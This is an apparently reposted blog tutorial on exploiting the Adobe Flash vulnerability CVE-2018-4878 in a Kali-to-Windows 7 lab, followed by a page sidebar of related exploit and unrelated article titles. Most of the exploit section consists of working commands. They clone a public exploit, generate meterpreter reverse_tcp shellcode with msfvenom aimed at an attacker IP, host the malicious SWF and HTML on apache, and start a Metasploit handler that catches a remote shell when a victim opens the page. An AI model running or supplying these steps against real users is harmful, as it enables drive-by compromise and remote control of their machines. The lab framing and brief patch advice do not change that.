CVE-2018-4878 flash vulnerability exploit tutorial

Others 2021-01-25 21:19:13 views: null

table of Contents

Vulnerability description
Impact version
Vulnerability detection
Exploit
Vulnerability hardening

Vulnerability description

This vulnerability is aimed at users who have installed flash version 28.0.0.137 or less. The attacker induces users to click on malicious websites to directly obtain shell permissions.

Impact version

Less than or equal to Adobe Flash Player 28.0.0.137 version

Vulnerability detection

Use tool:
https://github.com/anbai-inc/CVE-2018-4878

Put index.html and exploit.swf on our own web server and let the target machine access them. Sometimes the computer can pop up, and sometimes the IE browser crashes. It is estimated that the script is unstable.

Insert picture description here

Insert picture description here

Exploit

Adobe Flash Player 28.0.0.137 Download:
https://pan.baidu.com/s/1Si3PDbR6cGwkGITJUTikYg Extraction code: p9ok

Attack machine: kali
Target machine: windows7 +Adobe Flash Player 28.0.0.137

Kali first download the use tool:

git clone https://github.com/anbai-inc/CVE-2018-4878.git
cd CVE-2018-4878

msfvenom生成shellcode:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.206.128 lport=4444 -f python>./shellcode.txt

Insert picture description here
Replace the shellcode in the shellcode.txt text with the shellcode in cve-2018-4847.py

Insert picture description here
Continue to modify the swf and html generation path (exp generation directory)

Insert picture description here
Run the script to generate exp:

python cve-2018-4878.py

Start apache2:

service apache2 start

Copy exp to the web directory:

cp exploit.swf /var/www/html/
cp index.html /var/www/html/

msf open monitoring:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.206.128
set lport 4444
run


shell
whoami

When the target visits our generated html, it will get shell permissions

Insert picture description here

But later I found that sometimes it is unsuccessful, which also causes ie crash.

Insert picture description here

Vulnerability hardening

Update flash plugin: https://www.flash.cn/

Guess you like

Origin blog.csdn.net/weixin_41924764/article/details/109263837

CVE-2018-4878 flash vulnerability exploit tutorial

Adboe Flash _CVE-2018-4878 A remote code execution vulnerability reproducibility

CVE-2018-4878 vulnerability reproduction

CVE-2017-12615 Tomcat PUT arbitrary file upload vulnerability exploit tutorial

Tutorial zum Ausnutzen von Flash-Sicherheitslücken in CVE-2018-4878

Tutorial de explotación de vulnerabilidades flash CVE-2018-4878

Zookeeper unauthorized access vulnerability exploit

CVE-2020-0796_RCE vulnerability exploit recurrence (non-blue screen)

Exploit the vulnerability IIS6.0PUT

Hackers exploit Facebook vulnerability to launch phishing attack

Metasploit exploit to be published based tutorial

exploit-db graphic tutorial

CVE-2020-0796 vulnerability exploitation tutorial

Hackers exploit MinIO storage system vulnerability to compromise servers

DVR login bypass vulnerability _CVE-2018-9995 vulnerability reproducibility

CVE-2018-8174 vulnerability exploitation and vulnerability reinforcement

OpenSSH User Enumeration Vulnerability (CVE-2018-15473) Vulnerability Fix

CVE-2018-15664 Vulnerability Analysis Report

weblogic (CVE-2018-2628 vulnerability reproduction)

Linux (x86) Exploit Series III Off-By-One Vulnerability (Stack Based)

Novice tutorial-Samba penetration remote command injection vulnerability username map script (CVE-2007-2447)

Application Security - Tools - Adobe - Adobe Flash Player - Vulnerability - Summary

Software vulnerability CVE finishing

Smart contract vulnerability case, Euler Finance’s $196 million flash loan vulnerability analysis

Apache ActiveMQ broker Security Bypass Vulnerability (CVE-2018-11775)

Apache Hadoop remote privilege escalation vulnerability (CVE-2018-8029)

Docker Symlink Directory traversal vulnerability (CVE-2018-15664)

DHCP command execution vulnerability CVE-2018-1111 reproducibility

Apache JSPWiki Cross Site Scripting Vulnerability (CVE-2018-20242)

Weblogic arbitrary file upload vulnerability (CVE-2018-2894) reproduction

Recommended

Ranking

ElasticSearch-- data modeling best practices

Permission Maintenance - Shadow User Backdoor

Refactor the code using MVP mode

Quantitative investment-fundamental model-PVC multi-factor model

Spark Big Data Processing Lecture Notes 3.2 Mastering RDD Operators

Blazor page components (2)

Erlernen von Kenntnissen zur Android-Entwicklung – Kodierung, Verschlüsselung, Hash, Serialisierung und Zeichensätze

About Qi high in JAVA study notes SORM summary detailed personal explanation

Will you calculate the accuracy of the rope displacement sensor in the measurement?

OPENJTAG debugging learning (3): debugging using the gdb command line

Daily

More

2024-05-01(4)

2024-04-30(36)

2024-04-29(5)

2024-04-28(12)

2024-04-27(29)

2024-04-26(22)

2024-04-25(32)

2024-04-24(30)

2024-04-23(30)

2024-04-22(5)